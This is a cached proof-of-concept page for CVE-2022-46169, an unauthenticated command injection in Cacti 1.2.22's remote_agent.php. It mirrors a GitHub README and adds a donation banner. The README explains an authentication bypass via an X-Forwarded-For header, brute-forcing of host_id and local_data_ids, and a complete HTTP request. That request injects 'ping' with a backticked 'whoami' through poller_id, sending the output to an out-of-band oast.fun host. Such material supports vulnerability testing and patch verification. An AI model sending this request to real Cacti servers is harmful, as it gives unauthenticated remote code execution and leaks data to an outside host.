Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2022-46169 PoC — Cacti 命令注入漏洞

Source
https://github.com/0xf4n9x/CVE-2022-46169
Associated Vulnerability
Title:Cacti 命令注入漏洞 (CVE-2022-46169)
Description:Cacti是Cacti团队的一套开源的网络流量监测和分析工具。该工具通过snmpget来获取数据,使用RRDtool绘画图形进行分析,并提供数据和用户管理功能。 Cacti v1.2.22版本存在命令注入漏洞,该漏洞源于未经身份验证的命令注入,允许未经身份验证的用户在运行Cacti的服务器上执行任意代码。
Description
CVE-2022-46169 Cacti remote_agent.php Unauthenticated Command Injection.
Readme
# CVE-2022-46169

CVE-2022-46169 Cacti remote_agent.php Unauthenticated Command Injection.

## Auth Bypass

Add `X-Forwarded-For` header to bypass authentication, note that its value is not a fixed value.

![image](https://user-images.githubusercontent.com/40891670/206341900-5b4b4a59-92c5-4d19-9913-e97c1aa44180.png)

![image](https://user-images.githubusercontent.com/40891670/206342934-3e2f99e3-8ae6-406c-b28b-38bc6fd6c21c.png)

## Brute Force

Use Burp Intruder to fuzz test the values of `host_id` and `local_data_ids`.

![image](https://user-images.githubusercontent.com/40891670/206341202-253e43ec-da5b-43d1-8d3a-2e36c9041605.png)

![image](https://user-images.githubusercontent.com/40891670/206341491-aa41526b-12f8-4e97-999b-90f14a1d301b.png)

## RCE

The point of command injection is the `poller_id` parameter.

```http
GET /cacti/remote_agent.php?action=polldata&poller_id=;ping%20-c%202%20`whoami`.ccsy8s32vtc0000x5nagg8rkyboyyyyyc.oast.fun&host_id=2&local_data_ids[]=6 HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (X11; U; Linux armv6l; rv 1.8.1.5pre) Gecko/20070619 Minimo/0.020
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close
X-Forwarded-For: 127.0.0.1


```

![image](https://user-images.githubusercontent.com/40891670/206337930-d1c2c044-b7ea-47ff-a740-9f8320594816.png)


## Reference

- https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf
File Snapshot

 [4.0K]  /data/pocs/4fe22cb786c8d0f5da53d8aa13fc1ed3c7e26e9d
└── [1.4K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.